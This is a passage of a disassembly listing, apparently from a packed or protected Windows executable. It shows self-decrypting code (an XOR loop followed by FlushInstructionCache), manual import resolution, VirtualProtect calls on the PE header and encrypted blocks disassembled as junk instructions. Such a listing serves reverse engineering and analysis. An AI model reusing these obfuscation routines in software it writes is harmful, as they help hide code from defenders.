mov ecx, [ebp+var_34]
sub ecx, [eax+4]
sar ecx, 4
mov edx, [ebp+var_28]
mov eax, [edx+8]
mov edx, [ebp+var_24]
mov eax, [eax+ecx*4]
mov [edx+4], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, ds:dword_4A2908
mov ecx, [eax+0Ch]
add ecx, 1
mov edx, ds:dword_4A2908
mov [edx+0Ch], ecx
mov eax, [ebp+var_28]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_28]
mov [edx+14h], ecx
jmp loc_4954EB
; ---------------------------------------------------------------------------
loc_49567C: ; CODE XREF: sub_495490+16F�j
mov eax, ds:dword_4A2908
mov ecx, [ebp+var_1C]
mov [eax+8], ecx
mov [ebp+var_1C], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_49569C
jmp short loc_4956B5
sub_495490 endp
; =============== S U B R O U T I N E =======================================
sub_49569C proc near ; CODE XREF: sub_495490+205�p
; DATA XREF: _5:0049F438�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_4956B4
mov edx, [ebp-1Ch]
mov [ebp-44h], edx
mov eax, [ebp-44h]
push eax
call sub_4993DD
add esp, 4
locret_4956B4: ; CODE XREF: sub_49569C+4�j
retn
sub_49569C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_495490
loc_4956B5: ; CODE XREF: sub_495490+20A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_495490
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4956D0 proc near ; CODE XREF: sub_49B0C8+77�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004957AE SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F440
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov eax, ds:dword_4A28E8
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_495714
mov ecx, [ebp+var_24]
add ecx, 10h
push ecx
call ds:dword_49F01C ; RtlEnterCriticalSection
mov byte ptr [ebp+var_28], 1
jmp short loc_495718
; ---------------------------------------------------------------------------
loc_495714: ; CODE XREF: sub_4956D0+2F�j
mov byte ptr [ebp+var_28], 0
loc_495718: ; CODE XREF: sub_4956D0+42�j
mov edx, [ebp+var_28]
and edx, 0FFh
test edx, edx
jz loc_4957AE
mov [ebp+var_4], 0
cmp ds:dword_4A28E8, 0
jz short loc_495783
mov ecx, ds:dword_4A28E8
call sub_49CA67
loc_495744: ; CODE XREF: sub_4956D0:loc_495781�j
lea eax, [ebp+var_1C]
push eax
lea ecx, [ebp+var_20]
push ecx
mov ecx, ds:dword_4A28E8
call sub_49CA7E
and eax, 0FFh
test eax, eax
jz short loc_495783
mov edx, [ebp+var_1C]
cmp dword ptr [edx], 0
jnz short loc_495781
mov eax, [ebp+var_20]
mov ecx, [eax]
push ecx
call ds:dword_4A27EC ; RemoveFontResourceA
mov edx, [ebp+var_1C]
mov eax, [edx+4]
push eax
call ds:dword_4A26C0 ; DeleteFileA
loc_495781: ; CODE XREF: sub_4956D0+96�j
jmp short loc_495744
; ---------------------------------------------------------------------------
loc_495783: ; CODE XREF: sub_4956D0+67�j
; sub_4956D0+8E�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_495791
jmp short loc_4957AE
sub_4956D0 endp
; =============== S U B R O U T I N E =======================================
sub_495791 proc near ; CODE XREF: sub_4956D0+BA�p
; DATA XREF: _5:0049F448�o
mov ecx, ds:dword_4A28E8
mov [ebp-2Ch], ecx
cmp dword ptr [ebp-2Ch], 0
jz short locret_4957AD
mov edx, [ebp-2Ch]
add edx, 10h
push edx
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_4957AD: ; CODE XREF: sub_495791+D�j
retn
sub_495791 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4956D0
loc_4957AE: ; CODE XREF: sub_4956D0+53�j
; sub_4956D0+BF�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4956D0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4957BF proc near ; CODE XREF: sub_49589D+C�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0049588E SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F450
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
mov eax, offset dword_48E720
push dword ptr [eax+4]
call ds:dword_4A26C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_24], eax
mov eax, [ebp+var_30]
mov eax, [eax-4]
mov [ebp+var_2C], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov ecx, [ebp+var_2C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, [ebp+var_24]
shr eax, 10h
mov ecx, [ebp+var_2C]
add ecx, eax
mov [ebp+var_28], ecx
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
jmp short loc_49583A
; ---------------------------------------------------------------------------
loc_495833: ; CODE XREF: sub_4957BF+9D�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_49583A: ; CODE XREF: sub_4957BF+72�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jz short loc_49585E
mov eax, [ebp+var_1C]
imul eax, 19660Dh
add eax, 3C6EF35Fh
mov ecx, [ebp+var_1C]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+var_1C]
mov [eax], cl
jmp short loc_495833
; ---------------------------------------------------------------------------
loc_49585E: ; CODE XREF: sub_4957BF+81�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_20]
push eax
push [ebp+var_20]
push ds:dword_4A268C
call ds:dword_4A2670 ; FlushInstructionCache
or [ebp+var_4], 0FFFFFFFFh
call sub_49587F
jmp short loc_49588E
sub_4957BF endp
; =============== S U B R O U T I N E =======================================
sub_49587F proc near ; CODE XREF: sub_4957BF+B9�p
; DATA XREF: _5:0049F458�o
mov eax, offset dword_48E720
push dword ptr [eax+4]
call ds:dword_4A2754 ; RtlLeaveCriticalSection
retn
sub_49587F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4957BF
loc_49588E: ; CODE XREF: sub_4957BF+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4957BF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49589D proc near ; CODE XREF: sub_48EB7E�j
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
pusha
xor edx, edx
lea ecx, [ebp+arg_0]
call sub_4957BF
popa
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_49589D endp
; ---------------------------------------------------------------------------
loc_4958B6: ; CODE XREF: _4:0048EB83�j _4:0048EB88�j
mov ecx, 0EF000008h
call sub_499342
loc_4958C0: ; CODE XREF: sub_495DC0+12A�p
push ebp
mov ebp, esp
sub esp, 0F8h
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 0
jz loc_49598A
push 300000h
call sub_48EB7E
das
pop esp
jmp far ptr 0ACF4h:78C07626h
; ---------------------------------------------------------------------------
db 79h, 51h, 0C5h
dd 0D3767C0Eh, 9A3C1583h, 61222F3Ch, 569A14B2h, 51ACF93Bh
dd 795DE1D6h, 8AC55F6Ch, 6E1F4C7h, 0DDEA9A95h, 847AACBFh
dd 6408A2E6h, 0F4972036h, 0DEAD53CBh, 0D9318176h, 7A25BFCCh
dd 66815367h, 3D4A3AD5h, 24DA4C5Fh, 0C468C286h, 0A179C1BCh
dd 52068794h, 4B34FCBFh, 5121FE3h, 0D1F96FEFh, 627220C4h
dd 0B1617C44h, 5A424F31h, 7B38D747h, 0B9CB6DC2h, 99A668AAh
dd 1F06D28Ch, 313E4B8Bh, 3278658Bh, 0DED6E3F0h, 95A2B3C9h
dd 9E91AF1Fh, 433950ABh, 90901320h, 0C985C933h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_49598A: ; CODE XREF: _4:004958D0�j
cmp dword ptr [ebp+8], 0
jz loc_495A9D
mov dword ptr [ebp-0E4h], 0
push 5F0000h
call sub_48EB7E
ja short loc_495A0E
xor bl, ah
sahf
cli
inc eax
lodsb
les ebx, [ecx] ; CODE XREF: _4:004959B2�j
jns short near ptr loc_4959B0+1
into
test [esi+5C4DBBE2h], bl
; ---------------------------------------------------------------------------
db 0FEh
; ---------------------------------------------------------------------------
adc al, 7
cli
cdq
mov cl, [esi+eax*8]
mov ecx, 0F36FEBACh
add cl, [esi+ebx*2+58434451h]
retn 310h
; ---------------------------------------------------------------------------
dw 9DF6h
dd 0DFB43472h, 818E9B43h, 4DB11D00h, 0E893340h, 1A0D3981h
dd 0C745F0A4h, 7D8A64DEh, 0BA241770h, 63222F3Ch, 0E1EE187Ah
dd 521A50D4h, 0F1916C2Ch, 2A525F02h, 6B33E757h
db 29h
byte_495A0D db 7Dh ; CODE XREF: _4:00495A36�j
; ---------------------------------------------------------------------------
loc_495A0E: ; CODE XREF: _4:004959A8�j
sti
test eax, 0A9B628A2h
pushf
loc_495A15: ; CODE XREF: _4:00495A20�j
sti
enter 68AAh, 5Bh
dec esi
cmp eax, 4F6ED00Dh
jecxz short loc_495A15
out 0D9h, al
mov eax, 65B38C81h
loc_495A29: ; CODE XREF: _4:00495A49�j
xchg esp, ds:0C1542B53h[eax]
cmp al, 78h
bound edi, [ebx+1Bh]
out dx, eax
loop near ptr byte_495A0D
mov esi, 94A141C9h
xchg ecx, [esi]
pop es
mov edx, [ebx+46h]
cmp [ecx-7199795h], eax
jmp short loc_495A29
; ---------------------------------------------------------------------------
db 7Eh
dd 9D45C5B6h, 1DD88390h, 35429036h, 6A19B628h, 0B1251884h
dd 0A6DC5CFBh, 76E58A07h, 26C1FEBCh, 2F5D25Ch, 36296F67h
dd 0FB59B843h, 90907B88h, 0C085C033h, 8D8BEE75h, 0FFFFFF1Ch
dd 0FF088D89h, 958BFFFFh, 0FFFFFF08h, 3943E852h, 0C4830000h
db 4
; ---------------------------------------------------------------------------
loc_495A9D: ; CODE XREF: _4:0049598E�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_495AB0 proc near ; CODE XREF: sub_495D70+29�p
; sub_495DC0+234�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 48h
mov [ebp+var_4], 1
mov [ebp+var_8], 0
jmp short loc_495ACC
; ---------------------------------------------------------------------------
loc_495AC3: ; CODE XREF: sub_495AB0+106�j
; sub_495AB0+2A8�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_495ACC: ; CODE XREF: sub_495AB0+11�j
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
cmp dword ptr [edx+ecx+0Ch], 0
jnz short loc_495AE1
jmp loc_495D5D
; ---------------------------------------------------------------------------
loc_495AE1: ; CODE XREF: sub_495AB0+2A�j
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax+10h]
mov [ebp+var_20], edx
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
cmp ecx, [eax+34h]
jnz short loc_495B19
mov edx, [ebp+var_20]
mov [ebp+var_C], edx
jmp short loc_495B27
; ---------------------------------------------------------------------------
loc_495B19: ; CODE XREF: sub_495AB0+5F�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnz short loc_495B27
mov ecx, [ebp+var_20]
mov [ebp+var_C], ecx
loc_495B27: ; CODE XREF: sub_495AB0+67�j
; sub_495AB0+6F�j
mov [ebp+var_14], 0
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, [eax+edx+0Ch]
mov [ebp+var_24], ecx
cmp [ebp+arg_14], 0
jz short loc_495B5A
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_14]
push eax
call sub_49675D
add esp, 8
mov [ebp+var_14], eax
loc_495B5A: ; CODE XREF: sub_495AB0+95�j
cmp [ebp+var_14], 0
jnz short loc_495B6C
mov ecx, [ebp+var_24]
push ecx
call sub_49BF8C
mov [ebp+var_14], eax
loc_495B6C: ; CODE XREF: sub_495AB0+AE�j
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp dword ptr [eax+edx+4], 0FFFFFFFEh
setnz cl
mov byte ptr [ebp+var_1C], cl
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
cmp dword ptr [eax+edx+4], 0
jnz short loc_495B9F
mov ecx, [ebp+var_1C]
and ecx, 0FFh
test ecx, ecx
jz short loc_495BDD
loc_495B9F: ; CODE XREF: sub_495AB0+E0�j
mov edx, [ebp+arg_10]
and edx, 0FFh
test edx, edx
jz short loc_495BBD
cmp [ebp+var_14], 0
jnz short loc_495BBB
mov [ebp+var_4], 0
jmp loc_495AC3
; ---------------------------------------------------------------------------
loc_495BBB: ; CODE XREF: sub_495AB0+100�j
jmp short loc_495BDD
; ---------------------------------------------------------------------------
loc_495BBD: ; CODE XREF: sub_495AB0+FA�j
mov eax, [ebp+var_24]
push eax
call sub_49BE83
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_495BDD
mov ecx, [ebp+var_24]
push ecx
push offset aTheDynamicLink ; "The dynamic link library '%s' could not"...
call sub_4994F7
loc_495BDD: ; CODE XREF: sub_495AB0+ED�j
; sub_495AB0:loc_495BBB�j ...
mov edx, ds:off_4A1BE8
mov [ebp+var_18], edx
mov eax, [ebp+arg_C]
mov ds:off_4A1BE8, eax
push 0
call ds:dword_4A2718 ; GetModuleHandleA
cmp eax, [ebp+arg_4]
jnz short loc_495C62
mov [ebp+var_34], offset aExecutable ; "EXECUTABLE"
mov ecx, [ebp+arg_C]
mov [ebp+var_38], ecx
loc_495C08: ; CODE XREF: sub_495AB0+18A�j
mov edx, [ebp+var_38]
mov al, [edx]
mov [ebp+var_39], al
mov ecx, [ebp+var_34]
cmp al, [ecx]
jnz short loc_495C45
cmp [ebp+var_39], 0
jz short loc_495C3C
mov edx, [ebp+var_38]
mov al, [edx+1]
mov [ebp+var_3A], al
mov ecx, [ebp+var_34]
cmp al, [ecx+1]
jnz short loc_495C45
add [ebp+var_38], 2
add [ebp+var_34], 2
cmp [ebp+var_3A], 0
jnz short loc_495C08
loc_495C3C: ; CODE XREF: sub_495AB0+16B�j
mov [ebp+var_40], 0
jmp short loc_495C4D
; ---------------------------------------------------------------------------
loc_495C45: ; CODE XREF: sub_495AB0+165�j
; sub_495AB0+17C�j
sbb edx, edx
sbb edx, 0FFFFFFFFh
mov [ebp+var_40], edx
loc_495C4D: ; CODE XREF: sub_495AB0+193�j
mov eax, [ebp+var_40]
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jz short loc_495C62
mov [ebp+var_48], 0
jmp short loc_495C69
; ---------------------------------------------------------------------------
loc_495C62: ; CODE XREF: sub_495AB0+149�j
; sub_495AB0+1A7�j
mov [ebp+var_48], 1
loc_495C69: ; CODE XREF: sub_495AB0+1B0�j
mov cl, byte ptr [ebp+var_48]
mov byte ptr [ebp+var_10], cl
jmp short loc_495C83
; ---------------------------------------------------------------------------
loc_495C71: ; CODE XREF: sub_495AB0:loc_495D3A�j
mov edx, [ebp+var_20]
add edx, 4
mov [ebp+var_20], edx
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
loc_495C83: ; CODE XREF: sub_495AB0+1BF�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx], 0
jz loc_495D3F
mov edx, [ebp+var_C]
cmp dword ptr [edx], 0
jz loc_495D3F
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax+4], 0
jnz short loc_495CB8
mov edx, [ebp+var_1C]
and edx, 0FFh
test edx, edx
jz short loc_495D16
loc_495CB8: ; CODE XREF: sub_495AB0+1F9�j
mov eax, [ebp+var_C]
mov ecx, [eax]
and ecx, 80000000h
test ecx, ecx
jnz short loc_495CEA
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
add eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
add ecx, 2
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4A2728 ; GetProcAddress
mov ecx, [ebp+var_20]
mov [ecx], eax
jmp short loc_495D16
; ---------------------------------------------------------------------------
loc_495CEA: ; CODE XREF: sub_495AB0+215�j
mov edx, [ebp+var_C]
mov eax, [edx]
and eax, 0FFFFh
mov [ebp+var_30], eax
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_4A2728 ; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_495D16
mov eax, [ebp+var_20]
mov ecx, [ebp+var_2C]
mov [eax], ecx
loc_495D16: ; CODE XREF: sub_495AB0+206�j
; sub_495AB0+238�j ...
mov edx, [ebp+var_10]
and edx, 0FFh
test edx, edx
jz short loc_495D3A
mov eax, [ebp+var_24]
push eax
mov ecx, ds:off_4A1BE8
push ecx
mov edx, [ebp+var_20]
push edx
call sub_4963D0
add esp, 0Ch
loc_495D3A: ; CODE XREF: sub_495AB0+271�j
jmp loc_495C71
; ---------------------------------------------------------------------------
loc_495D3F: ; CODE XREF: sub_495AB0+1D9�j
; sub_495AB0+1E5�j
mov eax, [ebp+var_18]
mov ds:off_4A1BE8, eax
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx+4], 0FFFFFFFEh
jmp loc_495AC3
; ---------------------------------------------------------------------------
loc_495D5D: ; CODE XREF: sub_495AB0+2C�j
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_495AB0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_495D70 proc near ; CODE XREF: sub_496BD7+1B8�p
; sub_49714D+45�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4A2914
add eax, 1
mov ds:dword_4A2914, eax
mov ecx, [ebp+arg_14]
push ecx
mov dl, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_495AB0
add esp, 18h
mov [ebp+var_4], al
mov ecx, ds:dword_4A2914
sub ecx, 1
mov ds:dword_4A2914, ecx
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_495D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_495DC0 proc near ; CODE XREF: _4:0048F2A6�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 3Ch
mov [ebp+var_18], 0
call sub_493DD0
call sub_49ADD4
call sub_48D3F3
mov eax, ds:dword_4A2684
mov ecx, [eax+4]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+var_18]
add eax, [edx+3Ch]
mov ds:dword_4A2910, eax
mov ecx, ds:dword_4A2910
cmp dword ptr [ecx], 4550h
jz short loc_495E0D
mov ecx, 0EF000002h
call sub_499342
loc_495E0D: ; CODE XREF: sub_495DC0+41�j
mov edx, ds:dword_4A2698
sub edx, 3
mov [ebp+var_4], edx
cmp ds:dword_4A2680, 1
jz short loc_495E37
lea eax, [ebp+var_8]
push eax
push 4
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_4A27AC ; VirtualProtect
loc_495E37: ; CODE XREF: sub_495DC0+60�j
mov [ebp+var_14], 0
jmp short loc_495E49
; ---------------------------------------------------------------------------
loc_495E40: ; CODE XREF: sub_495DC0+AF�j
; sub_495DC0:loc_495F6D�j
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_495E49: ; CODE XREF: sub_495DC0+7E�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_4]
jnb loc_495F72
mov ecx, [ebp+var_14]
imul ecx, 28h
mov edx, ds:off_4A269C
add edx, ecx
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp dword ptr [eax+0Ch], 0
jnz short loc_495E71
jmp short loc_495E40
; ---------------------------------------------------------------------------
loc_495E71: ; CODE XREF: sub_495DC0+AD�j
cmp [ebp+var_14], 20h
jnb short loc_495E98
mov edx, 1
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, ds:dword_4A2684
mov ecx, [eax+10h]
and ecx, edx
test ecx, ecx
jz short loc_495E98
mov [ebp+var_34], 1
jmp short loc_495E9F
; ---------------------------------------------------------------------------
loc_495E98: ; CODE XREF: sub_495DC0+B5�j
; sub_495DC0+CD�j
mov [ebp+var_34], 0
loc_495E9F: ; CODE XREF: sub_495DC0+D6�j
mov edx, [ebp+var_34]
mov [ebp+var_28], edx
cmp [ebp+var_14], 20h
jnb short loc_495ECD
mov eax, 1
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, ds:dword_4A2684
mov edx, [ecx+14h]
and edx, eax
test edx, edx
jz short loc_495ECD
mov [ebp+var_38], 1
jmp short loc_495ED4
; ---------------------------------------------------------------------------
loc_495ECD: ; CODE XREF: sub_495DC0+E9�j
; sub_495DC0+102�j
mov [ebp+var_38], 0
loc_495ED4: ; CODE XREF: sub_495DC0+10B�j
mov eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_20]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_28]
push ecx
call loc_4958C0
mov edx, [ebp+var_20]
mov eax, [edx+24h]
and eax, 20000000h
test eax, eax
jz short loc_495F19
mov ecx, [ebp+var_20]
mov edx, [ecx+24h]
and edx, 80000000h
neg edx
sbb edx, edx
and edx, 20h
add edx, 20h
mov [ebp+var_3C], edx
jmp short loc_495F32
; ---------------------------------------------------------------------------
loc_495F19: ; CODE XREF: sub_495DC0+13C�j
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
and ecx, 80000000h
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 2
mov [ebp+var_3C], ecx
loc_495F32: ; CODE XREF: sub_495DC0+157�j
mov edx, [ebp+var_3C]
mov [ebp+var_24], edx
cmp ds:dword_4A2680, 1
jz short loc_495F6D
mov eax, ds:dword_4A2910
xor ecx, ecx
mov cx, [eax+14h]
mov edx, ds:dword_4A2910
lea eax, [edx+ecx+18h]
mov ecx, [ebp+var_14]
imul ecx, 28h
add eax, ecx
mov [ebp+var_30], eax
mov edx, [ebp+var_30]
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
mov [edx+24h], ecx
loc_495F6D: ; CODE XREF: sub_495DC0+17F�j
jmp loc_495E40
; ---------------------------------------------------------------------------
loc_495F72: ; CODE XREF: sub_495DC0+8F�j
cmp ds:dword_4A2680, 1
jz short loc_495FA3
mov edx, ds:dword_4A2910
mov eax, ds:off_4A269C
mov ecx, [eax-0Ch]
mov [edx+0ECh], ecx
mov edx, ds:dword_4A2910
mov eax, ds:off_4A269C
mov ecx, [eax-8]
mov [edx+0E8h], ecx
loc_495FA3: ; CODE XREF: sub_495DC0+1B9�j
cmp ds:dword_4A2680, 1
jz short loc_495FC3
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+var_8]
push eax
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_4A27AC ; VirtualProtect
loc_495FC3: ; CODE XREF: sub_495DC0+1EA�j
mov edx, ds:dword_4A2684
mov eax, [ebp+var_18]
add eax, [edx+8]
mov [ebp+var_C], eax
mov ds:dword_4A2914, 0
push 0
push 0
push offset aExecutable ; "EXECUTABLE"
mov ecx, ds:dword_4A2910
push ecx
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_C]
push eax
call sub_495AB0
add esp, 18h
call sub_49713C
and eax, 0FFh
test eax, eax
jz short loc_49601F
loc_49600A: ; CODE XREF: sub_495DC0+258�j
call sub_49714D
and eax, 0FFh
test eax, eax
jz short loc_49601A
jmp short loc_49600A
; ---------------------------------------------------------------------------
loc_49601A: ; CODE XREF: sub_495DC0+256�j
call sub_49713C
loc_49601F: ; CODE XREF: sub_495DC0+248�j
push offset aImm32_dll ; "imm32.dll"
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_496041
push offset aImm32_dll ; "imm32.dll"
mov ecx, [ebp+var_1C]
push ecx
call sub_496070
loc_496041: ; CODE XREF: sub_495DC0+271�j
push offset aOleoaut32_dll ; "oleoaut32.dll"
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_496063
push offset aOleaout32_dll ; "oleaout32.dll"
mov edx, [ebp+var_10]
push edx
call sub_496070
loc_496063: ; CODE XREF: sub_495DC0+293�j
mov esp, ebp
pop ebp
retn
sub_495DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496070 proc near ; CODE XREF: sub_495DC0+27C�p
; sub_495DC0+29E�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_4A2914
add eax, 1
mov ds:dword_4A2914, eax
mov ecx, [ebp+arg_4]
mov ds:off_4A1BE8, ecx
push 9
lea ecx, [ebp+var_28]
call sub_49C77C
lea edx, [ebp+var_28]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
call sub_4960D0
add esp, 0Ch
mov ecx, ds:dword_4A2914
sub ecx, 1
mov ds:dword_4A2914, ecx
mov [ebp+var_2C], 1
lea ecx, [ebp+var_28]
call sub_49C82A
mov eax, [ebp+var_2C]
mov esp, ebp
pop ebp
retn 8
sub_496070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4960D0 proc near ; CODE XREF: sub_496070+30�p
; sub_4960D0+24B�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F460
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp [ebp+arg_0], 0
jnz short loc_496101
jmp loc_4963BC
; ---------------------------------------------------------------------------
